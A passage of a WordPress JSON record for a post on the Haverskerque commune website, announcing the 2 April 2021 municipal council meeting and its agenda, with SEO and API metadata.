});<\/script>","protected":false},"excerpt":{"rendered":"<p>Le Conseil Municipal se r\u00e9unira ce vendredi 2 avril 2021 \u00e0 19h00. En cette p\u00e9riode de confinement et compte tenu des horaires de couvre-feu, l\u2019assistance, pour un citoyen, aux d\u00e9bats du conseil municipal ne constitue pas un motif d\u2019autorisation de sortie d\u00e9rogatoire. Ainsi, le maire ou le pr\u00e9sident ne peut autoriser l\u2019acc\u00e8s au public des s\u00e9ances de l\u2019organe d\u00e9lib\u00e9rant que pour les journalistes ou les personnes qui justifieraient d\u2019un motif professionnel pour y assister. Une retransmission en direct de la s\u00e9ance sera donc assur\u00e9e sur la page Facebook de la commune afin de permettre \u00e0 tous d\u2019assister aux d\u00e9bats. ORDRE DU JOUR&nbsp;: &#8211; APPROBATION DU PROC\u00c8S-VERBAL DU CONSEIL MUNICIPAL DU 18 JANVIER 2021. &#8211; FINANCES 1. Fiscalit\u00e9 2021.2. Vote du compte de gestion 2020 &#8211; Ville.3. Vote du compte administratif 2020 &#8211; Ville.4. Affectation des r\u00e9sultats 2020 &#8211; Ville.5. Vote du budget primitif 2021 &#8211; Ville.6. Attribution de subventions aux associations.7. Attribution de subventions aux personnes de droit priv\u00e9.8. Fixation des tarifs municipaux 2021.9. Demande de subvention au titre de la s\u00e9curisation des routes d\u00e9partementales en agglom\u00e9ration pour l\u2019exercice 2021 &#8211; Installation de deux radars p\u00e9dagogiques rue de Merville.10. Modernisation des moyens de paiement de la Ville &#8211; Adh\u00e9sion au service PayFip R\u00e9gie.11. Modernisation des moyens de paiement de la Ville &#8211; Mise en place du paiement par carte bancaire via une r\u00e9gie avec compte DFT. &#8211; AFFAIRES G\u00c9N\u00c9RALES 12. Renouvellement du bureau de l\u2019association fonci\u00e8re de remembrement.13. Convention d\u2019entretien du domaine public d\u00e9partemental en agglom\u00e9ration relative \u00e0 la signalisation horizontale&nbsp;: Autorisation de prise en charge de lentretien et signature de la convention.14. Cr\u00e9ation d\u2019un poste de conseiller municipal d\u00e9l\u00e9gu\u00e9 \u00e0 la communication.15. Fixation des indemnit\u00e9s de fonctions du conseiller municipal d\u00e9l\u00e9gu\u00e9 \u00e0 la communication. &#8211; INTERCOMMUNALIT\u00c9 16. Transfert de la comp\u00e9tence Plan Local d\u2019Urbanisme \u00e0 l\u2019intercommunalit\u00e9&nbsp;: refus de la commune d\u2019Haverskerque.17. Transfert de la comp\u00e9tence mobilit\u00e9 \u00e0 l\u2019intercommunalit\u00e9&nbsp;: accord de la commune d\u2019Haverskerque.18. Mise \u00e0 disposition du b\u00e2timent de l\u2019Arsenal dans le cadre de la cr\u00e9ation d\u2019un \u00ab\u00a0espace sant\u00e9\u00a0\u00bb ou d\u2019une \u00ab\u00a0maison de sant\u00e9 pluridisciplinaire\u00a0\u00bb&nbsp;: Autorisation de travaux de r\u00e9habilitation par le CIAS Flandre-Lys et signature d\u2019une convention.19. Am\u00e9nagement par la CCFL d\u2019un parking rue de l\u2019\u00c9glise \u00e0 Haverskerque&nbsp;: Autorisation de travaux et signature d\u2019une convention. &#8211; RESSOURCES HUMAINES 20. Mise en \u0153uvre du dispositif de contrat d\u2019engagement \u00e9ducatif (CEE) pour assurer le fonctionnement de l\u2019accueil de loisirs de la commune.21. Tableau des effectifs\u00a0: Mise \u00e0 jour au 01\/04\/2021.<\/p>\n","protected":false},"author":1,"featured_media":568,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[10],"tags":[],"class_list":["post-620","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-conseil-mnicipal"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Conseil Municipal du 02 Avril 2021 * Haverskerque, 100% Nature !*<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.haverskerque.fr\/index.php\/2021\/04\/03\/conseil-municipal-du-02-avril-2021\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Conseil Municipal du 02 Avril 2021 * Haverskerque, 100% Nature !*\" \/>\n<meta property=\"og:description\" content=\"Le Conseil Municipal se r\u00e9unira ce vendredi 2 avril 2021 \u00e0 19h00. En cette p\u00e9riode de confinement et compte tenu des horaires de couvre-feu, l\u2019assistance, pour un citoyen, aux d\u00e9bats du conseil municipal ne constitue pas un motif d\u2019autorisation de sortie d\u00e9rogatoire. Ainsi, le maire ou le pr\u00e9sident ne peut autoriser l\u2019acc\u00e8s au public des s\u00e9ances de l\u2019organe d\u00e9lib\u00e9rant que pour les journalistes ou les personnes qui justifieraient d\u2019un motif professionnel pour y assister. Une retransmission en direct de la s\u00e9ance sera donc assur\u00e9e sur la page Facebook de la commune afin de permettre \u00e0 tous d\u2019assister aux d\u00e9bats. ORDRE DU JOUR&nbsp;: &#8211; APPROBATION DU PROC\u00c8S-VERBAL DU CONSEIL MUNICIPAL DU 18 JANVIER 2021. &#8211; FINANCES 1. Fiscalit\u00e9 2021.2. Vote du compte de gestion 2020 &#8211; Ville.3. Vote du compte administratif 2020 &#8211; Ville.4. Affectation des r\u00e9sultats 2020 &#8211; Ville.5. Vote du budget primitif 2021 &#8211; Ville.6. Attribution de subventions aux associations.7. Attribution de subventions aux personnes de droit priv\u00e9.8. Fixation des tarifs municipaux 2021.9. Demande de subvention au titre de la s\u00e9curisation des routes d\u00e9partementales en agglom\u00e9ration pour l\u2019exercice 2021 &#8211; Installation de deux radars p\u00e9dagogiques rue de Merville.10. Modernisation des moyens de paiement de la Ville &#8211; Adh\u00e9sion au service PayFip R\u00e9gie.11. Modernisation des moyens de paiement de la Ville &#8211; Mise en place du paiement par carte bancaire via une r\u00e9gie avec compte DFT. &#8211; AFFAIRES G\u00c9N\u00c9RALES 12. Renouvellement du bureau de l\u2019association fonci\u00e8re de remembrement.13. Convention d\u2019entretien du domaine public d\u00e9partemental en agglom\u00e9ration relative \u00e0 la signalisation horizontale&nbsp;: Autorisation de prise en charge de lentretien et signature de la convention.14. Cr\u00e9ation d\u2019un poste de conseiller municipal d\u00e9l\u00e9gu\u00e9 \u00e0 la communication.15. Fixation des indemnit\u00e9s de fonctions du conseiller municipal d\u00e9l\u00e9gu\u00e9 \u00e0 la communication. &#8211; INTERCOMMUNALIT\u00c9 16. Transfert de la comp\u00e9tence Plan Local d\u2019Urbanisme \u00e0 l\u2019intercommunalit\u00e9&nbsp;: refus de la commune d\u2019Haverskerque.17. Transfert de la comp\u00e9tence mobilit\u00e9 \u00e0 l\u2019intercommunalit\u00e9&nbsp;: accord de la commune d\u2019Haverskerque.18. Mise \u00e0 disposition du b\u00e2timent de l\u2019Arsenal dans le cadre de la cr\u00e9ation d\u2019un \u00ab\u00a0espace sant\u00e9\u00a0\u00bb ou d\u2019une \u00ab\u00a0maison de sant\u00e9 pluridisciplinaire\u00a0\u00bb&nbsp;: Autorisation de travaux de r\u00e9habilitation par le CIAS Flandre-Lys et signature d\u2019une convention.19. Am\u00e9nagement par la CCFL d\u2019un parking rue de l\u2019\u00c9glise \u00e0 Haverskerque&nbsp;: Autorisation de travaux et signature d\u2019une convention. &#8211; RESSOURCES HUMAINES 20. Mise en \u0153uvre du dispositif de contrat d\u2019engagement \u00e9ducatif (CEE) pour assurer le fonctionnement de l\u2019accueil de loisirs de la commune.21. Tableau des effectifs\u00a0: Mise \u00e0 jour au 01\/04\/2021.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.haverskerque.fr\/index.php\/2021\/04\/03\/conseil-municipal-du-02-avril-2021\/\" \/>\n<meta property=\"og:site_name\" content=\"Haverskerque, 100% Nature !*\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/communehaverskerque\" \/>\n<meta property=\"article:published_time\" content=\"2021-04-03T13:08:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-29T04:39:07+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"630\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"chti pc en d\u00e9tresse\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"chti pc en d\u00e9tresse\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/04\\\/03\\\/conseil-municipal-du-02-avril-2021\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/04\\\/03\\\/conseil-municipal-du-02-avril-2021\\\/\"},\"author\":{\"name\":\"chti pc en d\u00e9tresse\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\"},\"headline\":\"Conseil Municipal du 02 Avril 2021\",\"datePublished\":\"2021-04-03T13:08:00+00:00\",\"dateModified\":\"2024-07-29T04:39:07+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/04\\\/03\\\/conseil-municipal-du-02-avril-2021\\\/\"},\"wordCount\":453,\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/04\\\/03\\\/conseil-municipal-du-02-avril-2021\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"articleSection\":[\"Conseil municipal\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/04\\\/03\\\/conseil-municipal-du-02-avril-2021\\\/\",\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/04\\\/03\\\/conseil-municipal-du-02-avril-2021\\\/\",\"name\":\"Conseil Municipal du 02 Avril 2021 * Haverskerque, 100% Nature !*\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/04\\\/03\\\/conseil-municipal-du-02-avril-2021\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/04\\\/03\\\/conseil-municipal-du-02-avril-2021\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"datePublished\":\"2021-04-03T13:08:00+00:00\",\"dateModified\":\"2024-07-29T04:39:07+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/04\\\/03\\\/conseil-municipal-du-02-avril-2021\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/04\\\/03\\\/conseil-municipal-du-02-avril-2021\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/04\\\/03\\\/conseil-municipal-du-02-avril-2021\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.haverskerque.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Conseil Municipal du 02 Avril 2021\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"name\":\"Haverskerque\",\"description\":\"Haverskerque, 100% Nature !\",\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"alternateName\":\"Haverskerque\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/haverskerque.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\",\"name\":\"Commune d'Haverskerque\",\"alternateName\":\"Commune d'Haverskerque\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"contentUrl\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"width\":236,\"height\":102,\"caption\":\"Commune d'Haverskerque\"},\"image\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/communehaverskerque\",\"https:\\\/\\\/www.instagram.com\\\/communehaverskerque\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\",\"name\":\"chti pc en d\u00e9tresse\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"caption\":\"chti pc en d\u00e9tresse\"},\"sameAs\":[\"https:\\\/\\\/haverskerque.fr\"],\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/author\\\/estorez\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Conseil Municipal du 02 Avril 2021 * Haverskerque, 100% Nature !*","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.haverskerque.fr\/index.php\/2021\/04\/03\/conseil-municipal-du-02-avril-2021\/","og_locale":"fr_FR","og_type":"article","og_title":"Conseil Municipal du 02 Avril 2021 * Haverskerque, 100% Nature !*","og_description":"Le Conseil Municipal se r\u00e9unira ce vendredi 2 avril 2021 \u00e0 19h00. En cette p\u00e9riode de confinement et compte tenu des horaires de couvre-feu, l\u2019assistance, pour un citoyen, aux d\u00e9bats du conseil municipal ne constitue pas un motif d\u2019autorisation de sortie d\u00e9rogatoire. Ainsi, le maire ou le pr\u00e9sident ne peut autoriser l\u2019acc\u00e8s au public des s\u00e9ances de l\u2019organe d\u00e9lib\u00e9rant que pour les journalistes ou les personnes qui justifieraient d\u2019un motif professionnel pour y assister. Une retransmission en direct de la s\u00e9ance sera donc assur\u00e9e sur la page Facebook de la commune afin de permettre \u00e0 tous d\u2019assister aux d\u00e9bats. ORDRE DU JOUR&nbsp;: &#8211; APPROBATION DU PROC\u00c8S-VERBAL DU CONSEIL MUNICIPAL DU 18 JANVIER 2021. &#8211; FINANCES 1. Fiscalit\u00e9 2021.2. Vote du compte de gestion 2020 &#8211; Ville.3. Vote du compte administratif 2020 &#8211; Ville.4. Affectation des r\u00e9sultats 2020 &#8211; Ville.5. Vote du budget primitif 2021 &#8211; Ville.6. Attribution de subventions aux associations.7. Attribution de subventions aux personnes de droit priv\u00e9.8. Fixation des tarifs municipaux 2021.9. Demande de subvention au titre de la s\u00e9curisation des routes d\u00e9partementales en agglom\u00e9ration pour l\u2019exercice 2021 &#8211; Installation de deux radars p\u00e9dagogiques rue de Merville.10. Modernisation des moyens de paiement de la Ville &#8211; Adh\u00e9sion au service PayFip R\u00e9gie.11. Modernisation des moyens de paiement de la Ville &#8211; Mise en place du paiement par carte bancaire via une r\u00e9gie avec compte DFT. &#8211; AFFAIRES G\u00c9N\u00c9RALES 12. Renouvellement du bureau de l\u2019association fonci\u00e8re de remembrement.13. Convention d\u2019entretien du domaine public d\u00e9partemental en agglom\u00e9ration relative \u00e0 la signalisation horizontale&nbsp;: Autorisation de prise en charge de lentretien et signature de la convention.14. Cr\u00e9ation d\u2019un poste de conseiller municipal d\u00e9l\u00e9gu\u00e9 \u00e0 la communication.15. Fixation des indemnit\u00e9s de fonctions du conseiller municipal d\u00e9l\u00e9gu\u00e9 \u00e0 la communication. &#8211; INTERCOMMUNALIT\u00c9 16. Transfert de la comp\u00e9tence Plan Local d\u2019Urbanisme \u00e0 l\u2019intercommunalit\u00e9&nbsp;: refus de la commune d\u2019Haverskerque.17. Transfert de la comp\u00e9tence mobilit\u00e9 \u00e0 l\u2019intercommunalit\u00e9&nbsp;: accord de la commune d\u2019Haverskerque.18. Mise \u00e0 disposition du b\u00e2timent de l\u2019Arsenal dans le cadre de la cr\u00e9ation d\u2019un \u00ab\u00a0espace sant\u00e9\u00a0\u00bb ou d\u2019une \u00ab\u00a0maison de sant\u00e9 pluridisciplinaire\u00a0\u00bb&nbsp;: Autorisation de travaux de r\u00e9habilitation par le CIAS Flandre-Lys et signature d\u2019une convention.19. Am\u00e9nagement par la CCFL d\u2019un parking rue de l\u2019\u00c9glise \u00e0 Haverskerque&nbsp;: Autorisation de travaux et signature d\u2019une convention. &#8211; RESSOURCES HUMAINES 20. Mise en \u0153uvre du dispositif de contrat d\u2019engagement \u00e9ducatif (CEE) pour assurer le fonctionnement de l\u2019accueil de loisirs de la commune.21. Tableau des effectifs\u00a0: Mise \u00e0 jour au 01\/04\/2021.","og_url":"https:\/\/www.haverskerque.fr\/index.php\/2021\/04\/03\/conseil-municipal-du-02-avril-2021\/","og_site_name":"Haverskerque, 100% Nature !*","article_publisher":"https:\/\/www.facebook.com\/communehaverskerque","article_published_time":"2021-04-03T13:08:00+00:00","article_modified_time":"2024-07-29T04:39:07+00:00","og_image":[{"width":1200,"height":630,"url":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","type":"image\/jpeg"}],"author":"chti pc en d\u00e9tresse","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"chti pc en d\u00e9tresse","Dur\u00e9e de lecture estim\u00e9e":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/04\/03\/conseil-municipal-du-02-avril-2021\/#article","isPartOf":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/04\/03\/conseil-municipal-du-02-avril-2021\/"},"author":{"name":"chti pc en d\u00e9tresse","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2"},"headline":"Conseil Municipal du 02 Avril 2021","datePublished":"2021-04-03T13:08:00+00:00","dateModified":"2024-07-29T04:39:07+00:00","mainEntityOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/04\/03\/conseil-municipal-du-02-avril-2021\/"},"wordCount":453,"publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/04\/03\/conseil-municipal-du-02-avril-2021\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","articleSection":["Conseil municipal"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/04\/03\/conseil-municipal-du-02-avril-2021\/","url":"https:\/\/www.haverskerque.fr\/index.php\/2021\/04\/03\/conseil-municipal-du-02-avril-2021\/","name":"Conseil Municipal du 02 Avril 2021 * Haverskerque, 100% Nature !*","isPartOf":{"@id":"https:\/\/haverskerque.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/04\/03\/conseil-municipal-du-02-avril-2021\/#primaryimage"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/04\/03\/conseil-municipal-du-02-avril-2021\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","datePublished":"2021-04-03T13:08:00+00:00","dateModified":"2024-07-29T04:39:07+00:00","breadcrumb":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/04\/03\/conseil-municipal-du-02-avril-2021\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.haverskerque.fr\/index.php\/2021\/04\/03\/conseil-municipal-du-02-avril-2021\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/04\/03\/conseil-municipal-du-02-avril-2021\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.haverskerque.fr\/"},{"@type":"ListItem","position":2,"name":"Conseil Municipal du 02 Avril 2021"}]},{"@type":"WebSite","@id":"https:\/\/haverskerque.fr\/#website","url":"https:\/\/haverskerque.fr\/","name":"Haverskerque","description":"Haverskerque, 100% Nature !","publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"alternateName":"Haverskerque","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/haverskerque.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/haverskerque.fr\/#organization","name":"Commune d'Haverskerque","alternateName":"Commune d'Haverskerque","url":"https:\/\/haverskerque.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/","url":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","contentUrl":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","width":236,"height":102,"caption":"Commune d'Haverskerque"},"image":{"@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/communehaverskerque","https:\/\/www.instagram.com\/communehaverskerque\/"]},{"@type":"Person","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2","name":"chti pc en d\u00e9tresse","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","caption":"chti pc en d\u00e9tresse"},"sameAs":["https:\/\/haverskerque.fr"],"url":"https:\/\/www.haverskerque.fr\/index.php\/author\/estorez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/620","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/comments?post=620"}],"version-history":[{"count":4,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/620\/revisions"}],"predecessor-version":[{"id":8308,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/620\/revisions\/8308"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media\/568"}],"wp:attachment":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media?parent=620"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/categories?post=620"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/tags?post=620"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}